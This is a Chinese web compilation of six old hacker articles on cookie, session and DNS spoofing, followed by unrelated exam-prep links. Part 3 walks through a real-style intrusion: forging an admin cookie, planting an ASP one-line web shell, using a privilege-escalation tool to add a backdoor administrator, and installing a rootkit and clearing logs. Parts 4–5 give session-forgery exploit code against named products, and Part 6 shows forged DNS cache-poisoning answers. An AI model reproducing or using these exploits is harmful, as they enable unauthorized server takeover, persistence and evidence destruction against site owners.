下面是小编给大家带来关于什么是Cookies和session欺骗?(实例讲解),本文共6篇,一起来看看吧,希望对您有所帮助。本文原稿由网友“双黄蛋好吃”提供。
篇1:什么是Cookies和session欺骗?(实例讲解)
cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用户权限登录,
什么是Cookies和session欺骗?(实例讲解)
,
那么什么是cookies呢,我这里给大家一个专业的解释,cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且只能被创建这个coo
篇2:什么是Cookies欺骗技术
第一、几个基本概念 Cookies欺骗,就是在只对用户做Cookies验证的系统中,通过修改Cookies的内容来得到相应的用户权限登录,
什么是Cookies欺骗技术
,
(呵呵,我自己的定义,高手别见笑) 那么什么是Cookies呢,我这里给大家一个专业的解释,Cookies是一个储存于浏览器目录中的文本文
篇3:Cookies欺骗的艺术
DB_OWNER权限,SQL Server禁止多句执行(偶就不能通过WEB方式备份得到shell了),开了3389(冲着它来的)
后台没什么功能,想放弃,可发现了下面的一幕
发现了一个计数器程序的readme
www.abc.com/count/readme.txt
有说明就好办,从网上下了个源程序来
发现漏洞文件count/admin.asp代码如下
_____________________________________________________________
<%
'******************************
'
' 飞越访客单用户统计系统
' 飞越 feiyueziwo@sohu.com
' www.pwsite.net
'
' 版权所有: 动力在线
'
'******************************
%>
<%
response.write Request.Cookies(feiyue)(“Username”)
if Request.Cookies(feiyue)(“Username”)=“” then
response.end
response.Redirect(“login.asp?action=error”)
end if%>
...........
_____________________________________________________________
cookies欺骗一句话就可以搞定
再IE里输入以下代码,再访问www.abc.com/count/admin.asp就是管理员了
javascript.:document.cookie=“feiyue=Username=cooldiyer”;
后台没什么可利用,郁闷,数据库插马本机测试可以成功,可它网站的不行,压缩了数据库还不行,
后台不能上传文件,只一个备份数据库功能,利用这个功能把数据库连接文件给显示了出来,得到
SQL Server连接用户和密码,远程连接后备份数据库log得到一个shell
主机开了Serv-U 6.2,上传Serv-U本地提权工具ftp.exe
写了一句话木马如下:
<%=Server.CreateObject(“wscript.shell”).exec(request(“cmd”)).stdout.readall%>
执行:
www.abc.com/shell.asp?cmd=D:\\www\\ftp.exe “net user cooldiyer /add”
www.abc.com/shell.asp?cmd=D:\\www\\ftp.exe “net localgroup administrators cooldiyer /add”
成功!连其3389端口,安上rootkit,CA一个管理员,CleanLog,闪人.......
篇4:Session欺骗的终极技术
看了第四期LM团伙写的《利用Session欺骗构造最隐蔽的WebShell》,虽然具体技术不是很明白,但是基本意思理解了,忽然有了自己的一点思想:现在的免费空间主目录和用户的目录都在同一个网站上,例如网站主目录是d:\\wwwroot,而用户申请的免费空间的目录就是d:\\wwwroot\\用户名,例如d:\\wwwroot\\iceworld,主站的管理员登录是通过Session验证的,如果我们在自己的空间内构造一个同主站相同的Session变量以及Session的值,是不是就可以欺骗主站呢?
不知道大家理解了没。
假如adminlogin.asp是主站管理员登录页面,如果登录成功,就把Session(“login”)=“yes”,并转到adminmanage.asp进行管理。当然,adminmanage.asp有Session(“login”)的检测。现在我们在自己申请的空间目录iceworld中建立一个文件admin.asp,这个文件的作用是使Session(“login”)=“yes”,我们先访问自己的admin。asp,然后访问adminlogin.asp,应该不用再登录了,而是直接进入adminmanage.asp。事实是否可以呢?我们找个免费空间测试一下。
以九酷网络提供的免费空间管理系统(V 4.0免费版)为例子来说明吧,本地测试先。
我们先分析一下。主目录是d:\\wwwroot\\9coolhome,管理目录是d:\\wwwroot\\9coolhome\\manage。默认用户目录是d:\\wwwroot\\9coolhome\\用户名。
先看看管理员登录过程,登录文件是login.asp,关键代码如下:
code=replace(trim(Request(“code”)),“’”,“”)
If codeCStr(Session(“CheckCode”)) Then
Response.Write(“”)
Response.End
end if
’上面代码是对验证码进行检测
name=htmlencode2(request.form(“name”))
pwd=htmlencode2(md5(request.form(“pwd”)))
loginip=Request.ServerVariables(“HTTP_X_FORWARDED_FOR”)
if loginip= “” then loginip=Request.ServerVariables(“REMOTE_ADDR”)
sql=“select * from manage_user where UserName=’”&name&“’ And PassWord=’”&pwd&“’”
rs.open sql,conn,1,3
If not rs.eof = True Then
rs(“logintime”)=Now
rs(“loginip”)=loginip
rs.update
Session(“name”) = rs(“username”)
Session(“pwd”) = rs(“password”)
Session(“time”) = now()
Response.Redirect(“default.asp”)
’如果接受到的用户名和密码正确,更新最后登录时间和IP地址,并且赋值给3个Session变量,然后转到管理页面default.asp,不知道大家有没有注意到那个SQL语句也有问题啊!
else
set rs2=server.createobject(“adodb.recordset”)
sql2=“select * from log”
rs2.open sql2,conn,1,3
rs2.AddNew
rs2(“type”)=“非法登录”
rs2(“username”)=name
rs2(“password”)=request.form(“pwd”)
rs2(“loginip”)=loginip
rs2(“time”)=now()
rs2.update
rs2.Close
set rs2=nothing
Response.write“”
end if
’如果登录失败的话,填写错误登录日志
管理页面default.asp的第一行包含了一个文件,,而这个admin.asp就是用户权限审核页面了,我们看看:
<%
if Session(“name”)=“” then
Response.write“”
response.End
end if
%>
只要Session(“name”)不为空就认为登录成功啊,好办了!我们申请一个用户iceworld,上传一个文件index.asp到自己的目录中去,内容如下:
<%
Session(“name”)=“yes”
response.Redirect(“../manage/default.asp”)
%>
访问看看,是不是直接进入了管理页面,
要进行这种Session欺骗,必须有三个前提:
1.进行欺骗的网页和被欺骗的网页必须位于同一个网站内,上期黑防上LM团伙和koshan已经说得很清楚了。
2.必须知道管理页面。
3.必须知道Session变量以及它的限制条件。
至于解决方法,第一个问题就不用说了吧,这篇文章就是在这个前提下进行的。第二个问题,相信大家以前SQL注入的时候早就遇到过,各显神通吧!对于第三个问题,首先看看主站是不是使用了别人写的程序,如果是的话,下载一个源程序进行查看,应该不会有很多人喜欢改源代码吧!如果是站长自己写的程序的话,我们就猜,跟猜后台一样:
Session(“name”)=“admin”
Session(“login”)=“admin”
Session(“AdminName”)=“admin”
......
当然不要手工进行了,我们在admin.asp中写上:
<%
Session(“name”)=“admin”
Session(“login”)=“admin”
Session(“AdminName”)=“admin”
’加上其它你所知道的
%>
为了照顾不会写ASP的同仁们,所以我写了一个简单的利用页面(见光盘index.asp)。很容易理解的。如果你刚好申请的是九酷的免费空间,的填写就可以了。
最后说明两点:
第1:虽然本文标题说是突破免费空间,但是应用不仅仅是免费空间哦!
第2:看了第四期中彭硕大哥写的《打破SSS的技术封锁》,只有一个感觉――爽!没有什么高深的技术,因为我基本上都能理解,而这种思路是学不来的!感谢黑防为我们提供这样好的文章,期待更好的文章!
篇5:利用WebEditor session欺骗漏洞
,
漏洞利用:
新建一个amxking.asp内容如下:
<%Session(“eWebEditor_User”) = “11111111”%>
访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp
篇6:DNS欺骗技术讲解(什么是dns)
什么是dns?
定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为,
原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“黑掉”了对方的网站,而是冒名顶替、招摇撞骗罢了。
现在的Internet上存在的DNS服务器有绝大多数都是用bind来架设的,使用的bind版本主要为bind 4.9.5+P1以前版本和bind 8.2.2-P5以前版本.这些bind有个共同的特点,就是BIND会缓存(Cache)所有已经查询过的结果,这个问题就引起了下面的几个问题的存在.
1>.DNS欺骗
在DNS的缓存还没有过期之前,如果在DNS的缓存中已经存在的记录,一旦有客户查询,DNS服务器将会直接返回缓存中的记录.
下面我们来看一个例子:
一台运行着unix的Internet主机,并且提供rlogin服务,它的IP地址为123.45.67.89,它使用的DNS服务器(即/etc/resolv.conf中指向的DNS服务器)的IP地址为98.76.54.32,某个客户端(IP地址为38.222.74.2)试图连接到unix主机的rlogin端口,假设unix主机的/etc/hosts.equiv文件中使用的是dns名称来允许目标主机的访问,那么unix主机会向IP为98.76.54.32的DNS服务器发出一个PTR记录的查询:
123.45.67.89 ->98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
IP为98.76.54.32的DNS服务器中没有这个反向查询域的信息,经过一番查询,这个DNS服务器找到38.222.74.2和38.222.74.10为74.222.38.in-addr.arpa.的权威DNS服务器,所以它会向38.222.74.2发出PTR查询:
98.76.54.32 ->38.222.74.2 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
请注意,38.222.74.2是我们的客户端IP,也就是说这台机子是完全掌握在我们手中的.我们可以更改它的DNS记录,让它返回我们所需要的结果:
38.222.74.2 ->98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
当98.76.54.32的DNS服务器收到这个应答后,会把结果转发给123.45.67.98,就是那台有rlogin服务的unix主机(也是我们的目标 :) ),并且98.76.54.32这台DNS服务器会把这次的查询结果缓存起来.
这时unix主机就认为IP地址为38.222.74.2的主机名为trusted.host.com,然后unix主机查询本地的/etc/hosts.equiv文件,看这台主机是否被允许使用rlogin服务,很显然,我们的欺骗达到了.
在unix的环境中,有另外一种技术来防止这种欺骗的发生,就是查询PTR记录后,也查询PTR返回的主机名的A记录,然后比较两个IP地址是否相同:
123.45.67.89 ->98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: trusted.host.com A
很不幸,在98.76.54.32的DNS服务器不会去查询这个记录,而会直接返回在查询2.74.222.38.in-addr.arpa时得到的并且存在缓存中的信息:
98.76.54.32 ->123.45.67.89 [Query]
NQY: 1 NAN: 1 NNS: 2 NAD: 2
QY: trusted.host.com A
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
那么现在unix主机就认为38.222.74.2就是真正的trusted.host.com了,我们的目的达到了!
这种IP欺骗的条件是:你必须有一台Internet上的授权的DNS服务器,并且你能控制这台服务器,至少要能修改这台服务器的DNS记录,我们的欺 能进行.
2>.拒绝服务攻击 Denial of service
还是上面的例子,如果我们更改位于38.222.74.2的记录,然后对位于98.76.54.32的DNS服务器发出2.74.222.38.in-addr.arpa的查询,并使得查询结果如下:
因为74.222.38.in-addr.arpa完全由我们控制,所以我们能很方便的修改这些信息来实现我们的目的.
38.222.74.2 ->98.76.54.32 [Answer]
NQY: 1 NAN: 2 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: www.company.com A 0.0.0.1
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
这样一来,使用98.76.54.32这台DNS服务器的用户就不能访问www.company.com了,因为这个IP根本就不存在!
3>.偷取服务 Theft of services
还是上面的例子,只是更改的查询结果如下:
38.222.74.2 ->98.76.54.32 [Answer]
NQY: 1 NAN: 3 NNS: 2 NAD: 2
QY: 2.74.222.38.in-addr.arpa PTR
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: www.company.com CNAME www.competitor.com
AN: company.com MX 0 mail.competitor.com
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
- GRE填空多空题解题思路实例讲解2025-01-08
- GRE填空看选项做题方法弊端实例讲解2022-12-20
- 三级英语经验成人英语三级考试完形填空:题型实例讲解2025-11-14
- 讲解图画和韵文的语文教案2022-12-17
- 名词性从句讲解和区分2022-12-24
- 英语中常见的连词和用法讲解2025-09-15
- 快捷留言簿v10.09 正式版上传漏洞和Cookie欺骗漏洞漏洞预警2022-12-20
- 复杂声音信号基频检测和处理的一种方法及实例2022-12-11
- 托福阅读句子插入题常见错误思路和解题技巧讲解2022-12-25
- 托福听力常见题型解题思路讲解之结构题和态度题2022-12-11